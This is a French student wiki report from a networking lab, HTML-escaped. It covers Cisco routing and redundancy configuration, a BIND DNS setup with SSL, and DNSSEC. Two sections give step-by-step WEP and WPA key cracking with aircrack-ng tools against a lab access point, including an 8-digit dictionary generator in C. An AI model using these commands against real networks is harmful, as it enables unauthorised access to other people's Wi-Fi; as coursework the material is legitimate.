=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
